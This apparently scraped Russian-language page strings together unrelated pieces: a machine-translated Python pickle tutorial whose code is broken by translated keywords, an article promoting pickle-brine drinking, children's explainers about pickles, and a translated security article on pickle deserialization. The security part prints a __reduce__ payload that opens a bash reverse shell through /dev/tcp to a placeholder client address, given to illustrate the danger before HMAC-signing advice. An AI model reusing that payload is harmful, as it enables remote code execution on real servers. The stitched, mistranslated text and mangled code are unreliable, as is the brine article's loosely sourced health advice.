Другим примером будет фрейм данных Pandas. Давайте определим фрейм данных Pandas.

 импортировать панд как pdmy_df = pd.DataFrame({ 
'имя': ['Алиса', 'Боб', 'Крис'],
'возраст': [25, 29, 33]
})

Теперь, мы можем замариновать его и распаковать в новую переменную.Новый DataFrame будет идентичным.

 с open('my_df.pickle', 'wb') как f: 
pickle.dump(my_df, f) с open('my_df.pickle', 'rb') как f:
my_df_unpickled = pickle.load( f)

Обратите внимание, что Pandas имеет встроенные методы, которые могут собирать и распаковывать фрейм данных. Они будут выполнять ту же работу, что и выше, но код будет чище. Производительность также идентична.

Тогда может возникнуть вопрос, почему мы должны использовать Pickle для фрейма данных, а не CSV?

Первый ответ – скорость .CSV удобочитаем, но это почти самый медленный способ хранения фрейма данных Pandas.

В этом посте SO оценивалась производительность различных способов сериализации фрейма данных Pandas.

Вторым преимуществом выбора фрейма данных Pandas являются типы данных. Когда мы записываем фрейм данных в файл CSV, все должно быть преобразовано в текст. Иногда это вызывает некоторые неудобства или проблемы, когда мы загружаем его обратно. Например, если мы записываем столбец даты и времени в CSV, нам, вероятно, потребуется указать строку формата, когда мы загрузим его обратно.

Однако эта проблема не существует для объекта pickle. То, что вы замариновали, вы гарантированно получите то же самое обратно, когда загрузите его. Нет необходимости делать что-либо еще.

Изображение Anelka с сайта Pixabay

Довольно часто используется Pickle, как я делал в предыдущих примерах. Они не ошибаются, но будет здорово, если мы сможем указать версию протокола Pickle (обычно самую высокую). Проще говоря, сериализация Pickle имеет разные версии. По мере итерации версий Python модуль Pickle также развивается.

Если вам интересно какие существуют версии и что было улучшено, вот список из официальной документации.

Версия протокола 0 — это исходный «удобочитаемый» протокол, обратно совместимый с более ранними версиями Python.

Версия протокола 1 — это старый двоичный формат, который также совместим с более ранними версиями Python.

Протокол версии 2 был представлен в Python 2.3. Это обеспечивает гораздо более эффективное травление классов нового стиля.

Протокол версии 3 был добавлен в Python 3.0. Он имеет явную поддержку объектов bytes и не может быть распакован Python 2.x. Это был протокол по умолчанию в Python 3.0–3.7.

Протокол версии 4 был добавлен в Python 3.4. Он добавляет поддержку очень больших объектов, выбор большего количества типов объектов и оптимизацию некоторых форматов данных. Это протокол по умолчанию, начиная с Python 3.8.

Протокол версии 5 был добавлен в Python 3.8. Он добавляет поддержку внеполосных данных и ускорение для внутриполосных данных.

Вообще говоря, более высокая версия всегда лучше, чем более низкие с точки зрения

  • Размер маринованных объектов
  • Производительность распаковки

Если мы маринуем фрейм данных Pandas, используя разные версии, мы можем увидеть разницу в размерах.

 с помощью open('my_df_p4.pickle', 'wb') как f: 
pickle.dump(my_df, f, протокол=4) с open('my_df_p3.pickle', 'wb') как f:
pickle.dump(my_df, f, протокол= 3) с open('my_df_p2.pickle', 'wb') как f:
pickle.dump(my_df, f, protocol=2) с open('my_df_p1.pickle', 'wb') как f:
pickle. дамп(my_df, f, протокол=1)
import osprint('P4:', os.path.getsize('my_df_p4.pickle'))print('P3:', os.path.getsize('my_df_p3.pickle' ))print('P2:', os.path.getsize('my_df_p2.pickle'))print('P1:', os.path.getsize('my_df_p1.pickle'))

Почему Python по-прежнему резервирует старая версия, а новая версия всегда лучше? Это потому, что протоколы не всегда обратно совместимы.Это означает, что мы должны выбрать более низкую версию, если мы хотим лучшей совместимости.

Однако, если мы используем объекты pickle без обратной совместимости, мы можем использовать перечисление, чтобы гарантировать, что наша программа использует самый последний (лучший). Пример следующий.

 pickle.dump(my_df, f, protocol=pickle.  HIGHEST_PROTOCOL  ) 
Изображение Shutterbug75 с Pixabay пользовательский класс.Вкратце, класс должен существовать, когда мы загружаем маринованный объект обратно.

Например, давайте определим простой класс «Человек» с двумя атрибутами и одним методом.

 class Person: 
def __init__(self, name, age):
self.name = name
self.age = agedef self_introduce(self):
print(f'Меня зовут {self.name} и мой возраст {self.age}')p = Person('Chris', 33)
p.self_introduce()

Теперь давайте сериализуем объект «p» с помощью Pickle.

 с открытым('человек.pickle', 'wb') as f: 
pickle.dump(p, f)

Проблема возникает, если класс не существует. Это произойдет, если мы попытаемся загрузить замаринованный объект в новой сессии, а класс не был определен. Мы можем смоделировать этот сценарий, удалив определение класса.

 del Person 

Тогда, если мы попытаемся загрузить замаринованный объект обратно, будет исключение.

 с open('person.pickle', 'rb') as f: 
p_unpickled = pickle.load(f)

Поэтому нам нужно убедиться, что класс существует, когда мы загружаем объект обратно.Однако, если определение класса немного отличается, это может не вызвать проблем, но поведение объекта может быть изменено на основе нового определения класса.

 class Person: 
def __init__(self, name, age):
self.name = name
self.age = agedef self_introduce(self):
print(f'(Modified) Меня зовут {self.name} и мой возраст {self.age}')

В новом определении класса я изменил печатное сообщение метода представления себя.

Тогда, если мы загрузим протравленный объект обратно, то ошибок не будет, но способ самовыведения будет отличаться от его исходного.

 с open('person.pickle', 'rb') as f: 
p_unpickled = pickle.load(f)p_unpickled.self_introduce()
Изображение Jenő Szabó с Pixabay

В этом последнем разделе мне нужно вернуться назад к моему первоначальному утверждению «почти все объекты Python можно замариновать». Я использую «почти все», потому что есть еще некоторые типы объектов, которые нельзя сериализовать в Pickle.

Типичным типом, который не может быть выделен, являются активные объекты соединений, такие как соединения сети или базы данных.Это имеет смысл, потому что Pickle не сможет установить соединение после его закрытия. Эти объекты могут быть воссозданы только при наличии надлежащих учетных данных и других ресурсов.

Другим типом, который необходимо упомянуть, будет модуль. Важный модуль также нельзя травить. См. пример ниже.

 import datetimewith open('datetime.pickle', 'wb') as f: 
pickle.dump(datetime, f)

Это важно знать, потому что это означает, что мы не сможем солить все в global( ) , так как там будет импортированный модуль.

Изображение от 旭刚 史 с Pixabay

В этой статье я представил встроенный в Python метод сериализации — Pickle. Его можно использовать для быстрой и простой сериализации. Он поддерживает почти все типы объектов Python, такие как функция и даже фрейм данных Pandas. При использовании Pickle для разных версий Python мы также должны иметь в виду, что версии Pickle также могут быть разными.

Если вы считаете, что мои статьи полезны, рассмотрите возможность присоединиться к Medium Membership, чтобы поддержать меня и тысячи других писателей! (Нажмите на ссылку выше)

8 причин, по которым вы должны пить рассол

Несмотря на то, что огурцы невероятно противоречивы, те, кто любит их, действительно любят их.И независимо от того, предпочитаете ли вы укроп из гастронома или несколько ломтиков хлеба с маслом, трудно отрицать, что маринованные пирожные сейчас набирают популярность. И не зря — это здоровая закуска, которую любят даже такие знаменитости, как Крисси Тейген.

А как же их сок? Вот все, что вам нужно знать о рассоле и обо всех причинах, по которым вам следует его пить. (Да, вы правильно прочитали.)

1. Может облегчить мышечные спазмы.

Доказано, что огуречный сок облегчает боли в мышцах.Одно время питье этого напитка после тренировок стало настолько популярным, что Gatorade чуть не выпустила собственную версию соленого напитка.

2. Делать шоты с рассолом — безумно весело.

Если у вас никогда не было ни одного из них, вы не живете. Помимо танцев на столе, это, возможно, самая глупая вещь, которую вы когда-либо делали в баре, но это один из тех вульгарных, «южных» трюков, которые вы должны попробовать хотя бы раз. Кто знает, может быть, вы полюбите их и привлечете к себе всех своих друзей.

Этот контент импортирован с YouTube. Вы можете найти тот же контент в другом формате или найти дополнительную информацию на их веб-сайте.

3. Он дольше сохраняет гидратацию.

Потягивать простой h30 — это здорово, но напиток, содержащий как натрий, так и калий, идеален, потому что он поможет вам быстрее избавиться от обезвоживания и оставаться таким. Они оба являются электролитами, которые вы теряете, когда потеете, а рассол содержит их оба.

4.Это очень бюджетно.

Рассол может заменить дорогие сладкие спортивные напитки. А иногда даже бесплатно, если держать в холодильнике банку соленых огурцов. Вы даже можете сделать свой собственный, замариновав огурцы в уксусе, чесноке и соли.

5. Доступнее, чем когда-либо.

Если ваш главный аргумент против рассолов состоит в том, что вам придется делать это из банки, то у вас больше нет оправданий. Соленый материал теперь доступен в консервированной форме для вашего удобства.

6. Он богат витаминами и антиоксидантами.

Маринованный сок содержит приличное количество антиоксидантов и витаминов С и Е, которые помогают повысить функцию иммунной системы, а также выполняют другие функции, укрепляющие здоровье организма.

7. Поможет похудеть.

Согласно исследованию Bioscience, Biotechnology, and Biochemistry , ежедневное употребление уксуса — основного ингредиента рассольного сока — может способствовать здоровой потере веса.

8. Регулирует уровень сахара в крови.

Исследование, опубликованное в Journal of Diabetes Research, показало, что употребление небольшой порции уксуса перед едой может помочь отрегулировать уровень сахара в крови человека после еды, особенно у людей с диабетом 2 типа.

Подписывайтесь на Делиш в Instagram.

Этот контент создается и поддерживается третьей стороной и импортируется на эту страницу, чтобы помочь пользователям указать свои адреса электронной почты.Вы можете найти дополнительную информацию об этом и подобном контенте на сайте piano.io.

Все ли соленья кислые? | Вандополис

Что такое чёрно-белое, чёрно-белое, чёрно-белое… и зелёное? Сдаться? Это, конечно же, три зебры, которые дерутся из-за огурца!

Мы точно не знаем, любят ли зебры огурцы настолько, чтобы драться из-за них, но нам они определенно нравятся. Это один из наших любимых зеленых продуктов здесь, в Вандерополисе. Сами по себе или в сочном чизбургере соленые огурцы просто не сравнимы!

Но что такое рассол? Хотите верьте, хотите нет, но это огурец, который был маринован .

Маринование — также называемое «маринованием» — это способ консервирования продуктов путем их ферментации в уксусе или солевом растворе, называемом «рассолом». Слово «рассол» на самом деле происходит от голландского слова pekel , что означает «рассол». специй для придания аромата маринадам

Обычные специи, добавляемые в рассол, включают чеснок, хрен, укроп и семена белой горчицы.Чтобы огурцы были более кислыми, в рассол можно добавить больше соли.

Многие продукты можно мариновать. Обычно маринованные продукты включают капусту (называемую «квашеной капустой») и свиные ножки.

То, что мы все знаем как рассол, это соленый огурец. Люди в Англии обычно называют соленья «огурцами», потому что они часто маринуют похожий на огурец овощ, называемый корнишоном.

Не все соленья кислые. Например, соленья для хлеба с маслом имеют ярко выраженный сладкий вкус, потому что в рассол добавляют сахар и другие подсластители.

Как и помидоры, огурцы (и, следовательно, соленые огурцы) технически являются фруктами. Однако вряд ли в ближайшее время вы найдете соленые огурцы — даже сладкие соленые огурцы — во фруктовом салате.

Большинство людей относятся к ним как к овощам, поскольку они выращиваются как овощи и не являются сладкими от природы. В качестве закуски маринованные огурцы представляют собой хорошую обезжиренную низкокалорийную альтернативу высококалорийным закускам с высоким содержанием жира.

Так как они маринуются в рассоле, вы должны знать, что маринады, как правило, имеют более высокий уровень натрия (соли), чем другие закуски.Соленые огурцы также являются источником витамина К.

Как делают соленья? | Вандополис

Как приготовить идеальный чизбургер? Вы можете начать с большого куска сочной говядины на теплой булочке с кунжутом. Затем идут начинки: сыр, кетчуп, горчица, майонез, листья салата, помидоры и лук. Многие из вас могут подумать, что мы забываем о лучшем. О чем мы говорим? Огурцы, конечно!

Соленья придают чизбургеру нужное количество остроты и кислинки.Конечно, они также хороши во многих бутербродах. В наши дни даже бутерброды с курицей выигрывают от соленых огурцов.

А вы когда-нибудь задумывались, откуда берутся огурцы? Подумайте об этом на секунду. Они растут на огурцах? Вы когда-нибудь видели огуречный куст? Каждую осень фермеры собирают огромное поле, полное солений?

Нет! Как некоторые Чудо-друзья, возможно, уже знают, соленые огурцы на самом деле являются огурцами. Они были сохранены в специальном растворе (так называемом рассоле). Рассол готовится из уксуса, соли и специальных приправ.

Ммм! Соленые огурцы звучат великолепно, не так ли? Некоторые из вас могут подумать: «Фууу! Валовой!” Но не позволяйте процессу обмануть вас. Результаты вкусные. Вот почему огурцы так популярны. Эксперты говорят, что люди во всем мире съедают пять миллионов фунтов соленых огурцов каждый день!

Если процесс приготовления солений кажется сложным, не беспокойтесь. При некоторой практике это может сделать каждый. На самом деле травление существует с древних времен. Первые соленья, вероятно, были сделаны более 2000 лет назад в Месопотамии из огурцов, произрастающих в Индии.

Сегодня травление стало более автоматизированным. Новые технологии и специальные машины позволяют компаниям производить больше солений, чем когда-либо прежде. Однако основной метод мало изменился за эти годы.

Основным ингредиентом солений являются огурцы. К огурцам добавляют уксусную кислоту, или уксус. После воды большую часть рассольного сока составляет уксус. Это также придает огурцам кисловатый привкус. Многие люди также добавляют сахар или искусственные подсластители. Они частично компенсируют кислый вкус уксуса.Соль также добавляется для большего аромата.

Со временем огурцы превращаются в соленые огурцы. Остальные ингредиенты составляют сок, в котором хранятся соленья. В определенные виды солений обычно добавляются другие ингредиенты. Некоторые популярные примеры включают укроп (для солений с укропом), душистый перец, корицу, гвоздику, черный перец и чеснок. Наконец, часто добавляют красители, консерванты и стабилизаторы. Это может продлить срок хранения и повысить согласованность между партиями.

Тебе нравятся соленые огурцы? Многим детям нравится их хруст и вкус! В следующий раз, когда вы откусите кусочек огурца, помните, что вы наслаждаетесь закуской, которая существует уже очень давно!

Травление Python: что это такое и как его безопасно использовать

В Python вы можете использовать pickle для сериализации (десериализации) структуры объекта в (из) потока байтов.Ниже приведены рекомендации по безопасному травлению Python.

Ашутош Агравал, старший консультант, и Арвинд Баладжи, младший консультант, Synopsys

Pickle в Python в основном используется для сериализации и десериализации структуры объекта Python. Другими словами, это процесс преобразования объекта Python в поток байтов для его сохранения в файле/базе данных, поддержания состояния программы между сеансами или передачи данных по сети. Поток выделенных байтов можно использовать для воссоздания исходной иерархии объектов путем распаковки потока.Весь этот процесс похож на сериализацию объектов в Java или .Net.

Когда поток байтов распаковывается, модуль pickle сначала создает экземпляр исходного объекта, а затем заполняет экземпляр правильными данными. Для этого поток байтов содержит только данные, относящиеся к исходному экземпляру объекта. Но одних только данных может быть недостаточно. Чтобы успешно распаковать объект, обработанный поток байтов содержит инструкции для распаковщика восстановить исходную структуру объекта вместе с операндами инструкций, которые помогают заполнить структуру объекта.

В соответствии с документацией на модуль pickle можно травить следующие типы:

  • Нет, правда и ложь
  • Целые числа, длинные целые числа, числа с плавающей запятой, комплексные числа
  • Обычные строки и строки Unicode
  • Кортежи, списки, наборы и словари, содержащие только доступные для выбора объекты
  • Функции, определенные на верхнем уровне модуля
  • Встроенные функции, определенные на верхнем уровне модуля
  • Классы, определенные на верхнем уровне модуля

Pickle позволяет различным объектам объявлять, как они должны обрабатываться с помощью метода __reduce__.Всякий раз, когда объект консервируется, вызывается определенный им метод __reduce__. Этот метод возвращает либо строку, которая может представлять имя глобального Python, либо кортеж, описывающий, как реконструировать этот объект при распаковке.

Обычно кортеж состоит из двух аргументов:

  • Вызываемый объект (который в большинстве случаев будет именем вызываемого класса)
  • Аргументы для передачи вышеприведенному вызываемому объекту

Библиотека pickle будет обрабатывать каждый компонент кортежа отдельно и будет вызывать вызываемый объект с предоставленными аргументами для создания нового объекта в процессе распаковки.

Опасность травления питона

Поскольку не существует эффективных способов проверки распаковываемого потока pickle, в качестве входных данных можно указать вредоносный код оболочки, что приведет к удаленному выполнению кода. Наиболее распространенным сценарием атаки, приводящим к этому, будет доверие к необработанным данным рассола, полученным по сети. Если соединение не зашифровано, полученный рассол также мог быть изменен в сети. Другой сценарий атаки — когда злоумышленник может получить доступ и изменить сохраненные файлы рассола из кешей, файловых систем или баз данных.

В следующем примере кода демонстрируется простая клиент-серверная программа. Сервер подключается к определенному порту и ждет, пока клиент отправит данные. Как только он получает данные, он распаковывает их.

 соединение, адрес = self.receiver_socket.accept()
данные = conn.recv (1024)
вернуть cPickle.loads (данные)
 

Если клиент не является доверенным, злоумышленник может получить удаленный код для выполнения на сервере и получить к нему доступ.

 класс Shell_code (объект):
  защита __reduce__(сам):
          вернуться (ос.system,('/bin/bash -i >& /dev/tcp/"IP-адрес клиента"/"ПОРТ прослушивания" 0>&1',))
оболочка = cPickle.dumps(Shell_code())
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('IP-адрес сервера','ПОРТ сервера'))
client_socket.send (оболочка)
 

Передовой опыт в рассоле

Модуль pickle по своей сути не является небезопасным. Следующие рекомендации позволяют безопасно реализовать pickle.

  • Ненадежный клиент или ненадежный сервер могут вызвать удаленное выполнение кода.Таким образом, рассол никогда не должен использоваться между неизвестными сторонами.
  • Убедитесь, что стороны, обменивающиеся огурцами, имеют зашифрованное сетевое соединение. Это предотвращает изменение или воспроизведение данных в сети.
  • Если безопасное соединение невозможно, любые изменения в pickle можно проверить с помощью криптографической подписи. Pickle можно подписать перед хранением или передачей, а его подпись можно проверить перед загрузкой на стороне получателя.
  • В сценариях, где хранятся данные pickle, проверьте разрешения файловой системы и обеспечьте защищенный доступ к данным.

В следующем примере кода демонстрируется криптографическая подпись и проверка. Криптографическая подпись, как упоминалось выше, помогает обнаруживать любое изменение замаринованных данных. Клиент использует HMAC для подписи данных. Он отправляет значение дайджеста вместе с обработанными данными на сервер, как показано ниже.

 pickled_data = pickle.dumps(данные)
дайджест = hmac.new('общий ключ', pickled_data, hashlib.sha1).hexdigest()
заголовок = '%s' % (дайджест)
conn.send (заголовок + '' + pickled_data)
 

Сервер получает данные, вычисляет дайджест и сверяет его с отправленным.

 соединение, адрес = self.receiver_socket.accept()
данные = conn.recv (1024)
recvd_digest, pickled_data = data.  

Добавить комментарий

Ваш адрес email не будет опубликован.